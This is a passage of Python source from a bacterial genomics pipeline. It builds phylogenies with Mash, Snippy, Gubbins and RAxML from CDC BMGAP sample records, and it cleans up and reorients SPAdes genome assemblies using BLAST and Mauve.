sketch_info = {"sketch_dict":sketch_info_dict,"temp_dir":temp_dir}
return sketch_info
def mash_sketch_list(threads,mash_assembly_list,output_dir,proj_name,temp_dir):
print("Running Mash")
kmer_size = 32
sketch_size = 10000
with open(os.path.join(temp_dir,"temp_assembly_list"),"w") as f:
for obj in mash_assembly_list:
f.write("{}\n".format(obj))
mash_assembly_list = os.path.join(temp_dir,"temp_assembly_list")
unique_time = str(time.time()).split(".")[1]
out_sketch_name = "{}_{}".format("BMGAP_DATA_MASH_DB",unique_time)
output_sketch = os.path.join(output_dir,out_sketch_name)
call(["mash sketch -k {} -p {} -l {} -s {} -o {}".format(kmer_size,threads,mash_assembly_list,sketch_size,output_sketch)], shell=True)
call(["rm {}".format(mash_assembly_list)], shell=True)
return("{}.msh".format(output_sketch))
def make_mash_matrix(threads,genome_list,output_dir,proj_name,temp_dir):
print("Running Mash")
kmer_size = 32
sketch_size = 10000
with open(os.path.join(temp_dir,"temp_assembly_list"),"w") as f:
for obj in genome_list:
f.write("{}\n".format(obj))
mash_assembly_list = os.path.join(temp_dir,"temp_assembly_list")
unique_time = str(time.time()).split(".")[1]
out_sketch_name = "{}_{}".format(proj_name,unique_time)
output_sketch = os.path.join(output_dir,out_sketch_name)
call(["mash sketch -k {} -p {} -l {} -s {} -o {}".format(kmer_size,threads,mash_assembly_list,sketch_size,output_sketch)], shell=True)
call(["rm {}".format(mash_assembly_list)], shell=True)
output_sketch = "{}.msh".format(output_sketch)
mash_results = check_output(["mash","dist","-p",threads,output_sketch,output_sketch],shell=False)
mash_result = re.split(b"\n",mash_results.rstrip())
headers = []
data_set = {}
for line in mash_result:
line = line.decode(encoding)
query = line.split("\t")[0]
query = os.path.basename(query)
query = query.split(".")[0]
subject = line.split("\t")[1]
subject = os.path.basename(subject)
subject = subject.split(".")[0]
score = float(line.split("\t")[2])
if query not in data_set:
data_set[query] = {}
if subject not in data_set[query]:
data_set[query][subject] = score
if query not in headers:
headers.append(query)
i=0
final_text="\t"
header_dict={}
for query in sorted(headers):
header_dict[i] = query
i+=1
final_text+="{}\t".format(query)
final_text+="\n"
    final_text = final_text.replace("\t\n","\n")
for query in sorted(data_set):
final_text+="{}\t".format(query)
for i in range(0,len(headers)):
current_score = data_set[query][header_dict[i]]
final_text+="{}\t".format(current_score)
final_text+="\n"
        final_text = final_text.replace("\t\n","\n")
return(final_text)
def call_snippy(ref,file_path):
entry = file_path.split("/")[-1]
if ".fasta" in entry:
entry_name = entry.replace(".fasta","")
else:
entry_name = entry
if "_" in entry_name:
entry_name = entry_name.split("_")[0]
call(["snippy","--outdir",os.path.join(OUTPUT_DIR,"snippy_dir","{}".format(entry_name)),"--cpus","1","--ref",ref,"--ctgs",file_path,"--force"],shell=False)
#call(["snippy","--outdir",os.path.join(OUTPUT_DIR,"snippy_dir","{}".format(entry_name)),"--cpus","1","--ref",ref,"--ctgs",file_path],shell=False)
return True
def snippy_check(snippy_dir):
total_size = 0.0
i=0
size_dict = {}
redo_list = []
for snp_file in os.listdir(snippy_dir):
file_path = os.path.join(snippy_dir,snp_file)
size = os.stat(file_path).st_size
total_size += float(size)
i+=1
size_dict[snp_file] = size
avg_size = float(total_size/i)
for obj in size_dict:
if size_dict[obj] < avg_size:
redo_list.append(obj)
return redo_list
def run_snippy(final_genomes,threads,query_assemblies,dir_flag):
processes = int(threads)
pool = Pool(processes)
snippy_dir = os.path.join(OUTPUT_DIR,"snippy_dir")
snippy_list = []
if os.path.isdir(snippy_dir):
        print("Snippy Directory",snippy_dir,"already exists, not creating")
else:
os.system("mkdir {}".format(snippy_dir))
print("Created Output Directory",snippy_dir)
for file_path in final_genomes["all_genomes"]:
snippy_list.append(file_path)
for file_path in query_assemblies:
snippy_list.append(file_path)
ref = final_genomes["ref"]
snippy_time = [pool.apply_async(call_snippy,args=(ref,in_file)) for in_file in snippy_list]
output = [result.get() for result in snippy_time]
pool.terminate()
redo_list = snippy_check(snippy_dir)
if len(redo_list) > 0:
for obj in redo_list:
for item in snippy_list:
if obj in item:
call_snippy(ref,item)
return snippy_dir
# def update_mash_sketch(mash_db,assembly_list):
# mash_info_assemblies = {}
# mash_info = check_output(["mash info {}".format(mash_db)],shell=True)
# pp.pprint(mash_info)
# mash_info = mash_info.decode(encoding)
# mash_info_lines = mash_info.split("\n")
# print(mash_info_lines)
# for line in mash_info_lines:
# print(line)
# if line.strip() == "":
# continue
# else:
# if "[Hashes]" in line:
# continue
# line = line.replace(" ","***")
# line_items_pre = line.split("***")
# line_items = []
# for obj in line_items_pre:
# if obj.strip() != "":
# line_items.append(obj)
# if len(line_items) == 4:
# mash_info_assemblies[line_items[2]] = ""
# pp.pprint(mash_info_assemblies)
# check_set = []
# for genome_file_path in assembly_list:
# genome_file = genome_file_path.split("\\")[-1]
# if genome_file not in mash_info_assemblies:
# check_set.append(genome_file_path)
# return(check_set)
# def paste_sketch(threads,mash_db,input_file,temp_dir):
# print("Running Mash")
# threads = threads
# in_file_name = input_file.split("\\")[-1]
# kmer_size = 32
# sketch_size = 10000
# call(["mash sketch -k {} -p {} -s {} -o {} {}".format(kmer_size,threads,sketch_size,os.path.join(temp_dir,"input_sketch.msh"),input_file)], shell=True)
# sketch_path = os.path.join(temp_dir,"input_sketch.msh")
# call(["mash paste {} {}".format(mash_db,sketch_path)],shell=True)
# print("added {} to mash db".format(in_file_name))
# call(["rm {}".format(os.path.join(temp_dir,"input_sketch.msh"))],shell=True)
def call_bmgap_api():
final_data = {} #set up dict to hold our final data
#since there is no direct way to filter by run using the API yet, we will use a different approach
#we will pull all of the data from BMGAP, and then filter it ourselves by the run that we want
#since there is no way to pull all of the data from BMGAP, we will do one API call with default settings to get the count the total # of records, then another to pull all of those records
url_1 = 'http://amdportal-sams.cdc.gov/bmgap-api/samples' #first url
#this is the actual API request below. REST APIs usually have two options (GET and POST). GET is when we want to get data, POST is when we want to submit data. Either one can also return data.
request = http.request("GET",url_1) #request is a httpresponse object, we want the data stored in it, and we want to decode it from bytes to utf-8 unicode
request_data = json.loads(request.data.decode('utf-8')) #this handles the decoding, and it converts the json to a python dictionary "request_data"
#pp.pprint(request_data) #print the data we got
#for category in request_data:
# print(category) #this shows us that there are three main categories in the data, "docs", "total" and "limit" - the docs store the record data, and total tells us how many records exist in BMGAP, limit is set to 50 by default
total_records = request_data["total"] #get total record count
pages = math.ceil(total_records/1000)
#print(pages)
print("grabbing {} BMGAP records across {} pages".format(total_records,pages)) #print how many records we will get in the next API call
    #print(type(total_records)) #make sure "total_records" is an integer and not a string, and it is an int
merged_data = []
for i in range(1,pages+1):
print("getting page {}".format(i))
url_2 = 'http://amdportal-sams.cdc.gov/bmgap-api/samples?page={}&perPage={}'.format(i,1000) #Now that we know how many records exist, we will pull them all by adding the perPage filter
request = http.request("GET",url_2)
#pp.pprint(request.data.decode('utf-8'))
request_data = json.loads(request.data.decode('utf-8')) #override our previous request_data with the total records
#for record in request_data["docs"]: #now that we know that we want to loop through docs, we do so here and print each record
# pp.pprint(record)
merged_data.append(request_data["docs"])
#time.sleep(60)
total = 0
for obj in merged_data:
for record in obj:
total+=1
print("got {} BMGAP records".format(total)) #make sure we got them all by printing the count of the records
for obj in merged_data:
for record in obj:
if "mash" in record:
if "QC_flagged" in record: #if the record has been QC flagged
if record["QC_flagged"]: #true means it was flagged as bad quality
continue #skip
else:
if "assemblyPath" in record:
assembly_path = record["assemblyPath"]
#orig_assembly_file = assembly_path.split("/")[-1]
#assembly_file = orig_assembly_file.replace("-","_")
#assembly_path = os.path.join(assembly_path.replace(orig_assembly_file,""),assembly_file)
else:
continue
lab_id = record["Lab_ID"]
bmgap_id = record["identifier"]
assembly_file = assembly_path.split("/")[-1]
final_data[bmgap_id] = {"lab_id":lab_id,"assembly_path":assembly_path,"assembly_file":assembly_file}
#pp.pprint(final_data)
#print(len(final_data))
return final_data
def error(error_dict):
for error in error_dict:
print(error_dict[error],error)
exit()
def main():
### Main Arg Parse ###
parser = argparse.ArgumentParser(description="Automated Phylogeny Builder v1")
parser.add_argument('-d','--indir',help="Input Directory: Directory of FASTA files to analyze")
parser.add_argument('-o','--out',help="Output Directory", required=True)
parser.add_argument('-t','--threads',help="Number of max threads to use (default=1)",default="1")
parser.add_argument('-b','--mash_db',help="Provide prebuilt mash DB, otherwise build from scratch")
parser.add_argument('-f','--fast',help="Fast option for distance based neighbor joining tree", action="store_true")
parser.add_argument('-m','--max_num',help="Maximum number of isolates to include (default=50)",default="50")
parser.add_argument('-g','--genomes',help="Provide genome directory to build tree with instead of automatically picking, requires -r flag")
parser.add_argument('-r','--reference',help="Required with -g flag; provide reference to use for phylogeny when providing genome directory")
parser.add_argument('-s','--snippy',help="existing snippy dir, requires -g and -r")
parser.add_argument('-p','--proj_name',help="project prefix - will be used to label all files associated with project", required=True)
args = vars(parser.parse_args())
start_time = time.time()
### Print Args ###
print ("Running with the following parameters:")
for arg in args:
print (arg,":",args[arg])
### Set Output (Create if doesn't exist already) ###
set_output(args["out"])
### Initialize variables ###
automatic_selection = True
threads = args["threads"]
q_dict = {}
sketches_dict = {}
sketches = []
sketch_info = {}
results_dict = {}
thresholds = {}
error_dict = {}
temp_dir = tempfile.mkdtemp()
project_name = args["proj_name"]
dir_flag = False
mash_assembly_list = []
max_num = int(args["max_num"])
if args["fast"]:
need_ref = False
else:
need_ref = True
if args["mash_db"]:
mash_db = args["mash_db"]
if args["indir"]:
input_dir = args["indir"]
query_assemblies = []
if args["snippy"]:
if not args["genomes"]:
error_dict["snippy dir provided without genome dir, exiting"] = "Input error: "
error(error_dict)
if not args["reference"]:
error_dict["snippy dir provided without reference, exiting"] = "Input error: "
error(error_dict)
automatic_selection = False
if args["genomes"] and args["reference"]:
input_dir = args["genomes"]
reference = args["reference"]
dir_flag = True
automatic_selection = False
if args["genomes"] and not args["reference"]:
error_dict["Genome dir provided without reference, exiting"] = "Input error: "
error(error_dict)
if args["reference"] and not args["genomes"]:
error_dict["Reference provided without genome directory, exiting"] = "Input error: "
error(error_dict)
in_file_counter = 0
for in_file in os.listdir(input_dir):
in_file_path = os.path.join(input_dir,in_file)
query_assemblies.append(in_file_path)
in_file_counter +=1
max_num_per_query = (max_num-in_file_counter)/in_file_counter
query_sketch = mash_sketch_list(threads,query_assemblies,OUTPUT_DIR,project_name,temp_dir)
if need_ref:
ref_path = pick_reference(query_sketch,threads)
if not args["mash_db"]:
bmgap_data = call_bmgap_api()
for record in bmgap_data:
mash_assembly_list.append(bmgap_data[record]["assembly_path"])
mash_db = mash_sketch_list(threads,mash_assembly_list,OUTPUT_DIR,project_name,temp_dir)
if automatic_selection:
        final_genomes = pick_genomes(query_sketch,mash_db,args["threads"],int(max_num_per_query),force_max=False) # force_max is accepted but currently unused by pick_genomes
if need_ref:
final_genomes["ref"] = ref_path
print(ref_path)
else:
final_genomes = {"all_genomes":[],"details":{},"ref":args["reference"]}
for infile in os.listdir(args["genomes"]):
for ext in fasta_extensions:
if ext in infile:
infile_path = os.path.join(args["genomes"],infile)
if infile_path not in final_genomes["all_genomes"]:
final_genomes["all_genomes"].append(infile_path)
continue
#pp.pprint(final_genomes)
if not args["fast"]:
if not args["snippy"]:
snippy_dir = run_snippy(final_genomes,args["threads"],query_assemblies,dir_flag)
else:
snippy_dir = args["snippy"]
redo_list = snippy_check(snippy_dir)
for obj in redo_list:
print(obj)
for genome in os.listdir(input_dir):
print(genome)
if obj in genome:
print("found")
                    redo_obj = os.path.join(input_dir,genome)
call_snippy(reference,redo_obj)
call(["snippy-core --prefix={}_core --aformat=fasta {}/*".format(project_name,snippy_dir)], shell=True)
p2 = Popen(["mv {}_core* {}".format(project_name,snippy_dir)], shell=True)
p2.wait()
p3 = Popen(["python3 {} {}/{}_core.full.aln -o {}".format(mask_map_script,snippy_dir,project_name,OUTPUT_DIR)], shell=True)
p3.wait()
masked_aln_file = "{}/{}_core.full_masked.aln".format(OUTPUT_DIR,project_name)
partition_file = "{}/{}_core.full_partition.txt".format(OUTPUT_DIR,project_name)
print("gubbins")
p4 = Popen(["run_gubbins.py -c {} -i 10 -u -p {}/gubbins_masked -v -t raxml {}".format(args["threads"],OUTPUT_DIR,masked_aln_file)], shell=True)
p4.wait()
gubbins_phylip_file = "{}/gubbins_masked.filtered_polymorphic_sites.phylip".format(OUTPUT_DIR)
p5 = Popen(["python3 {} {} {}".format(adjust_size_script,gubbins_phylip_file,partition_file)], shell=True)
p5.wait()
abs_output = os.path.abspath(OUTPUT_DIR)
print("raxml")
p6 = Popen(["raxmlHPC-PTHREADS -s {} -w {} -n {}_out --asc-cor=stamatakis -q {} -m GTRGAMMAX -T {} -N autoMRE -p 6420662893125220392 -f a -x 7125452922221827660".format(gubbins_phylip_file,abs_output,project_name,partition_file,args["threads"])], shell=True)
p6.wait()
else:
mash_matrix = make_mash_matrix(threads,final_genomes["all_genomes"],OUTPUT_DIR,project_name,temp_dir)
# with open("test_out.txt","w") as f:
# f.write(mash_matrix)
i=2
matrix = []
names = []
firstLine = True
mash_matrix_lines = mash_matrix.split("\n")
for line in mash_matrix_lines:
if line.strip() != "":
if firstLine:
print(line)
current_names = line.split("\t")
for obj in current_names:
if len(obj) > 0:
names.append(obj)
firstLine = False
else:
sub_matrix = []
values = line.split("\t")
for q in range(1,i):
val = float(values[q])
sub_matrix.append(val)
matrix.append(sub_matrix)
i+=1
#print(names)
#print(len(names),len(matrix))
print("building tree")
dm = _DistanceMatrix(names,matrix)
constructor = DistanceTreeConstructor(method="nj")
tree = constructor.nj(dm)
Phylo.write([tree],"my_tree.tree","newick")
if __name__ == "__main__":
main()
```
#### File: pipeline/AssemblyCleanup/AssemblyCleanup.py
```python
SCRIPT_VERSION = 1
SCRIPT_SUBVERSION = 23
#pylint: disable=global-statement, broad-except
import re
import pandas as pd
from Bio import SeqIO, SeqRecord
import os
import sys
# import gzip
# import zlib
# import stat
import time
# from shutil import copyfile
# from collections import defaultdict
# import itertools
# import functools
# import urllib.request
import utilities
import seq_utilities
import BLASThelpers
from BLASThelpers import BLASTheaders as bh
from Bio.Blast.Applications import NcbiblastnCommandline
import shlex
import NGS_data_utilities
import AssemblyStats
from MauveHelper import MauveHelper, mauve_jar
script_base = os.path.basename(__file__)
_outputBase = '{}_v{}.{}'.format(os.path.splitext(script_base)[0],SCRIPT_VERSION,SCRIPT_SUBVERSION)
my_file = __file__
if os.path.islink(my_file):
my_file = os.path.realpath(my_file)
SCRIPT_DIR, SCRIPT_NAME = os.path.split(my_file)
SCRIPT_DIR = os.path.abspath(SCRIPT_DIR)
ContigHeaders = ['Contig_ID','Length','Coverage','Contig']
RO_argset = set(['circle_new_start','reverse_contig','closed_circle','broken_circle','circularize_with_Ns','reference'])
DIS_argset = set(['length','coverage','assembler','Mean_Coverage'])
# def cleanup_SPADES_folder(input_folder,output_folder, **kwargs):
# utilities.safeMakeDir(output_folder)
# for filename in os.listdir(input_folder):
# if filename.endswith('.fasta'):
# in_file = os.path.join(input_folder,filename)
# base = os.path.basename(filename)
# out_file = os.path.join(output_folder,base)
# kwargs['export_contig_data'] = out_file+'_ContigStats.csv' ##Override any that was passed, since we have multiple files
# cleanup_SPADES_file(in_file,out_file,**kwargs)
# def cleanup_SPADES_file(input_file, output_file, **kwargs):
# with open(input_file,'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,'fasta')]
# cleaned = cleanup_SPADES(seqs,**kwargs)
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
def cleanup_SPADES(contigs,minimum_length, minimum_coverage, export_contig_data=None,discard_file=None,export_contig_graph=None):
contig_table = AssemblyStats.parse_SPADES(contigs,export_contig_graph=export_contig_graph,export_contig_data=export_contig_data)
good_length = contig_table['Contig_Size'] > minimum_length
if (contig_table.Coverage.isnull().any()):
raise Exception("Null value in coverage table during Assembly Cleanup. Unable to filter")
good_contig_bool = good_length
else:
good_coverage = contig_table['Coverage'] > minimum_coverage
good_contig_bool = good_coverage & good_length
good_contig_table = contig_table[good_contig_bool]
good_contigs = good_contig_table['Contig'].tolist()
if discard_file is not None:
try:
discard_contigs = contig_table[~good_contig_bool]['Contig'].tolist()
SeqIO.write(discard_contigs,discard_file,utilities.guessFileFormat(discard_file)[0])
except Exception as e:
print(e)
raise
return good_contigs
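# Illustrative call (thresholds are hypothetical, not project defaults): keep contigs
# strictly longer than 500 bp with SPAdes k-mer coverage strictly above 5x, and write
# everything else to a discard file:
#   kept = cleanup_SPADES(contigs, minimum_length=500, minimum_coverage=5,
#                         discard_file='discarded_contigs.fasta')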
## set format for BLAST tabular output
_BLASTheaderList = ['qseqid','sseqid','length','qcovhsp','qstart','qend','qlen','sstart','send','slen','qcovs',
'evalue','bitscore','pident','sstrand']
_outfmt_str, _outfmt_head = BLASThelpers.BLASTtableCommandAndHeaders(_BLASTheaderList)
### This reorients closed circular contigs so that they start at the same place as a reference contig
### This was intended for both raw and reference to be single contigs, but it is not necessary (though multi-contig is untested)
## Raw_contig is a list of SeqRecords (should be single)
## Reference file is the sequence file that you want to align to
def reorientClosedChromosome(raw_contig,reference_file,N_padding=-1,working_dir=None,set_steps=5,set_window=5000):
temp_dir = None
if isinstance(working_dir,str):
try:
utilities.safeMakeDir(working_dir)
temp_dir = working_dir
except IOError:
pass ##Leave temp_dir as None
if temp_dir is None:
temp_dir = utilities.safeMakeOutputFolder('AssemblyCleanup_temp_')
## Setup blast database for the sequences you are searching against
raw_contig_dict = SeqIO.to_dict(raw_contig)
raw_contig_file = os.path.join(temp_dir,utilities.makeSafeName("-".join(raw_contig_dict.keys())))
SeqIO.write(raw_contig,raw_contig_file,'fasta')
db_name = os.path.join(temp_dir,os.path.basename(raw_contig_file))
BLASThelpers.makeblastdb(raw_contig_file)
##Get several chunks near the beginning of the reference file, as query
ref_seqs = seq_utilities.seqs_guess_and_parse2list(reference_file)
for rs in ref_seqs:
rename = re.sub('\W','_',rs.name)
steps = set_steps
window = set_window
expected_search_length = steps * window - 1
if len(rs) < expected_search_length:
steps = len(rs) // window
if steps == 0:
steps = 1
window = len(rs)
search_length = steps * window
print("Reference sequence is only {}bp; dropping search sequence from {} to {}".format(len(rs),expected_search_length,search_length))
else:
search_length = expected_search_length
SearchWindows = []
for i in range(0,search_length,window):
end_base = i + window
contig = rs[i:end_base]
contig.id = 'fragment_{}_to_{}'.format(i,end_base)
SearchWindows.append(contig)
query_basename = rename+'_WindowsQuery.fasta'
# re.sub('[^\w\s-]', '', value).strip().lower())
query_filename = os.path.join(temp_dir,query_basename)
with open(query_filename,'wt') as seq_out:
SeqIO.write(SearchWindows,seq_out,'fasta')
##Run BLAST
outfile = os.path.join(temp_dir,rename + '_' + os.path.basename(db_name))
##Note: may need to have "high stringency" and "low stringency" options. This is low stringency (for mapping to distant relatives). High stringency would increase perc_identity here and the qcovs filtering of "results"
blast_cline = NcbiblastnCommandline(query=shlex.quote(query_filename),db=shlex.quote(db_name),outfmt=_outfmt_str,out=shlex.quote(outfile),evalue=1E-100,perc_identity=80,qcov_hsp_perc=25,num_threads=2)
stdout = stderr = None
try:
stdout, stderr = blast_cline()
except Exception as e:
print("Blast failed on {} with {}...output below...".format(rename,reference_file))
print("\t{}".format(stdout))
print("\t{}".format(stderr))
print(e)
raise
results = pd.read_table(outfile,names=_outfmt_head)#No headers in file
        results = results[results[bh['qcovs']] > 50].sort_values(bh['bitscore'],ascending=False) ##Should already be sorted by bitscore
full_start = full_end = 0 ##BLAST uses a 1 index
first_hit = None
coherent_fragments = 0
for w in SearchWindows:
window_hits = results[results[bh['qseqid']] == w.id]
if len(window_hits) > 0:
hit = window_hits.iloc[0]
start = hit[bh['sstart']]
end = hit[bh['send']]
contig = hit[bh['sseqid']]
forward = start < end
if first_hit is None: ##Serves as a sign that there was no prior hit
first_hit = hit
hit_contig = contig
full_start = start
full_end = end
full_forward = forward
else: ##Check that it is consistent with prior
in_order = (contig == hit_contig)
in_order &= full_forward == forward
in_order &= (full_end < start) == full_forward
in_order &= abs(end - full_end) < 2 * window
if in_order:
full_end = end
coherent_fragments += 1
else:
print("Warning: Contig {} is not in order. \nStopping".format(w.id))
break #For search windows
else:
print("Warning: Failed to find a match to fragment {}".format(w.id))
if coherent_fragments > 0:
print('Stopping since we have an anchor already')
break #For search windows
if coherent_fragments > 0:
print("Shifting contig {} ({} bp)".format(hit_contig,len(raw_contig_dict[hit_contig])))
new_contigs = shiftCirclarChromosome(raw_contig_dict[hit_contig],full_start,not full_forward,N_padding)
del raw_contig_dict[hit_contig]
for new_contig in new_contigs:
raw_contig_dict[new_contig.id] = new_contig
assert len(new_contig) != 0, 'Contig with length 0. Aborting. Contact developer'
print('Rotating contig: {}'.format(hit_contig))
print('Starting at {}'.format(full_start))
if full_forward:
print("keeping orientation")
else:
print("Reverse complement")
else:
print('Aborting: Failed to identify the start position based on the reference genome.')
print("\t Reorient contig by specifying args.circle_new_start and/or args.reverse_contig")
blast_results = outfile+'.tab'
print('\t Saving BLAST results at '+blast_results)
results.to_csv(blast_results,sep='\t')
return None
return [x for x in raw_contig_dict.values()]
def reorientContigs(raw_contigs,reference_file,working_dir,name=None,input_format=None):
utilities.safeMakeDir(working_dir)
mh = MauveHelper(True) ##looks in pre-defined location (mulitple versions)
if (mh.mauve_dir is None):
sys.exit("Cannot Find the Mauve path")
elif not os.path.isfile(mh.mauve_dir + mauve_jar):
sys.exit("Cannot Find the Mauve jar file. Searched on this path: "+mh.mauve_dir)
else:
if name is None:
name = 'noName'+time.strftime("%H%M%S")
temp_ext = 'fasta'
if input_format is None:
input_format = 'fasta'
elif input_format in ['gb','embl']:
input_format = 'gb'
temp_ext = 'gbk'
elif input_format != 'fasta':
print("Reorient contigs input format not recognized. Using raw FASTA.")
input_format = 'fasta'
assembly_file = os.path.join(working_dir,name+'_intermediate.'+temp_ext)
SeqIO.write(raw_contigs,assembly_file,input_format)
reorder_stats = mh.reorder_contigs(os.path.abspath(reference_file), assembly_file, working_dir)
return reorder_stats ##TODO: clean up this loop
# ##New_start is BLAST index (1, not 0)
# def reLigateCircularContig(contig,new_start,keep_forward):
# first_start = new_start - 1 if keep_forward else new_start ##Convert to 0 index; if reverse, then identify last base in final contig
# broken_contig = contig[first_start:] + contig[:first_start]
# assert len(broken_contig) == len(contig), 'Reorientation changes length. Oops!'
# final_contig = broken_contig if keep_forward else broken_contig.reverse_complement()
# final_contig.id = contig.id+'_Reorient'
# final_contig.name = contig.name+'_Reorient'
# final_contig.description = contig.description+'_Reorient'
# return final_contig
##This breaks the contig at the specified location, flips the new contgis if specified, and seals them back together if N_padding is specified
## Returns a list of contigs
def shiftCirclarChromosome(raw_contig,new_start,reverse_contig,N_padding=-1):
assert isinstance(raw_contig,SeqRecord.SeqRecord)
first_start = new_start - 1 if not reverse_contig else new_start ##Convert to 0 index; if reverse, then identify last base in final contig
if first_start in [0,len(raw_contig)]: ##Either hits first base 0 or last base in reverse direction (so index is last base + 1)
broken_contigs = [raw_contig] ##don't break
if N_padding >= 0:
if N_padding == 0:
broken_contig = raw_contig[first_start:] + raw_contig[:first_start]
print("Joining fragments with no padding")
else:
print("N_padding not implementing. Exiting")
return None
broken_contig.id += '_Reorient'
broken_contig.name += '_Reorient'
broken_contig.description += '_Reorient'
broken_contigs = [broken_contig]
else:
broken_contigs = [raw_contig[first_start:],raw_contig[:first_start]]
print("Leaving fragments as separate contigs")
i = 0
for contig in broken_contigs:
addendum = '_Fragment_{}'.format(i)
contig.id += addendum
contig.name += addendum
contig.description += addendum
i += 1
# assert sum(broken_contigs) == len(contig), 'Reorientation changes length. Oops!'
final_contigs = []
if reverse_contig:
final_contigs = [c.reverse_complement(id=c.id, name=c.name+'_rc', description=c.description+' (reverse complement)') for c in reversed(broken_contigs)]
else:
final_contigs = broken_contigs
assert len(raw_contig) == sum(len(contig) for contig in final_contigs), "Final contig lengths do not match original length"
return final_contigs
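## Usage sketch (hypothetical values, not part of the pipeline; illustrates the return behavior):
## from Bio.Seq import Seq
## from Bio.SeqRecord import SeqRecord
## rec = SeqRecord(Seq('ATG' * 1000), id='chrom1', name='chrom1', description='closed circular contig')
## fragments = shiftCirclarChromosome(rec, new_start=1500, reverse_contig=False, N_padding=0)
## ## With N_padding=0 the two pieces are religated, so a single '_Reorient' record of the original
## ## length is expected; with N_padding=-1 two '_Fragment_*' records are returned instead.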
##kwargs is passed to reorientation script (working_dir is primary concern right now)
def cleanupAndWrite(assembly_file,output_file,circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
length=None,coverage=None,report_file=None,reference=None,assembler=None,working_dir=None):
##Note: no sanity checks
## Load the assemblies
assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
output_format,output_compressed = utilities.guessFileFormat(output_file)
if assembly_format != output_format:
print("Warning on cleanup: input and output formats do not match ({} and {})".format(assembly_format,output_format))
with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
seqs = [c for c in SeqIO.parse(fin,assembly_format)]
#Precise manipulation of single contig
updated_seqs = None
if circle_new_start or reverse_contig:
if len(seqs) > 1:
print("Error: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly: \n"+assembly_file)
return 1
elif closed_circle:
print("Shifting closed circle...")
updated_seqs = shiftCirclarChromosome(seqs[0],circle_new_start,reverse_contig,N_padding=0)
elif broken_circle:
print("Shifting broken circle...")
updated_seqs = shiftCirclarChromosome(seqs[0],circle_new_start,reverse_contig,N_padding=-1)
elif circularize_with_Ns > 0:
print('Scaffolding not implemented')
else:
print('To shift a chromosome, you must specify whether the circle is closed or broken')
else: ## Complex criteria for manipulation
if closed_circle and len(seqs) > 1:
print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
## Remove the low-quality contigs:
##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
circular = closed_circle or broken_circle##Circles imply high-quality sequence
if not circular:
if length is None:
length = 0
if coverage is None:
coverage = 0
if assembler is None:
print("Removing short contigs from assembly.")
updated_seqs = [x for x in seqs if len(x) > length]
# if coverage
elif assembler.upper()=='SPADES':
print("Removing low quality contigs from SPADES assembly. Length < {}; coverage < {}".format(length,coverage))
raw_filename = os.path.join(os.path.dirname(report_file),os.path.basename(assembly_file))
image_file = None # utilities.setExt(raw_filename, 'png') ##Note: this has been moved to the calculateStats routine
discard_file = utilities.appendToFilename(raw_filename, '_discarded') ##ext is same as assembly file
updated_seqs = cleanup_SPADES(seqs,minimum_length = length, minimum_coverage = coverage,export_contig_data=report_file,discard_file=discard_file,export_contig_graph=image_file)
else:
print("Error: assembler ({}) unknown for non-circular assembly. Not attempting to cleanup contigs in file: \n{}".format(assembler,assembly_file))
return 1
## Reorient to reference if requested
if reference:
input_seqs = updated_seqs if updated_seqs is not None else seqs
if os.path.isfile(reference):
if circular:
if len(input_seqs) > 1:
print('Warning: multiple contigs in "circular" assembly. Only one contig will be reoriented and I cannot tell you which one. Untested.')
if len(input_seqs) > 0:
N_padding = -1 ##Do not religate
if closed_circle:
N_padding=0
elif circularize_with_Ns > 0:
print('Scaffolding not implemented')
return 1
print("Reorienting circular chromosome to reference...")
updated_seqs = reorientClosedChromosome(input_seqs,reference,N_padding=N_padding,working_dir=working_dir) #Note: only treated as closed if N_padding >= 0
else: ## Len == 0
print("None of {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
return 1
else:
if working_dir is None:
working_dir = os.path.splitext(output_file)[0]
draft_name = os.path.splitext(os.path.basename(assembly_file))[0]
print("Reorienting contigs")
reorder_stats = reorientContigs(input_seqs,reference,working_dir,name=draft_name,input_format=assembly_format) ##Will be genbank format
if isinstance(reorder_stats,dict) and ('ReorderedDraft' in reorder_stats):
updated_seqs = seq_utilities.seqs_guess_and_parse2list(reorder_stats['ReorderedDraft']) ##Excessive to reload... but it fits in this flow
else:
updated_seqs = None
else:
print("Unable to realign to reference because there is no refernce file: {}".format(reference))
if updated_seqs is None:
print("Unable to clean and orient the assembly: \n\t"+assembly_file)
return 1
else:
with open(output_file,'wt') as fout:
SeqIO.write(updated_seqs,fout,output_format)
print('Saved cleaned assembly at {}'.format(output_file))
if output_compressed:
print("Warning. Compression not implemented. The file extension is misleading")
return 0
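## Illustrative call (file names are hypothetical; keyword names match the signature above):
## rc = cleanupAndWrite('assembly.fasta', 'cleaned.fasta', length=250, coverage=5,
##                      assembler='spades', reference='ref.fasta',
##                      report_file='cleaned.report.txt', working_dir='cleanup_work')
## ## rc is 0 on success and 1 on failure, the same convention used by single() and multiple() below.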
def single(args):
assembly_file = args.assembly
if not os.path.isfile(assembly_file):
print("Exiting. Unable to find file {}".format(assembly_file))
return 1
# assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
if args.output:
output_file = args.output
output_dir = os.path.dirname(output_file)
else:
output_dir = utilities.safeMakeOutputFolder(_outputBase)
basename = utilities.appendToFilename(os.path.basename(assembly_file),'_RO')
output_file = os.path.join(output_dir,basename)
logFile = os.path.join(output_dir,"AssemblyCleanup.log")
sys.stdout = utilities.Logger(logFile)
print(_outputBase)
report_file = os.path.join(output_dir,os.path.basename(assembly_file)) + '.report.txt'
has_out = os.path.isfile(output_file)
has_rpt = os.path.isfile(report_file)
if has_out or has_rpt:
if args.force:
if has_out:
print("Removing prexisting file: {}".format(output_file))
os.remove(output_file)
if has_rpt:
print("Removing pre-existing file: {}".format(report_file))
os.remove(report_file)
else:
print("Exiting. Refusing to overwrite pre-existing output files: \n\t{}\n\t{}".format(output_file,report_file))
return 1
try:
open(output_file, 'a').close()
except IOError:
print("Exiting. Do not have permission to write to output file")
return 1
###########Should probably be a method
process = None
if args.reorient:
process = 'RO'
elif args.discard:
process = 'DIS'
elif args.discard_then_reorient:
process = 'DIS_RO'
else:
print("Exiting. No processing specified")
return(1)
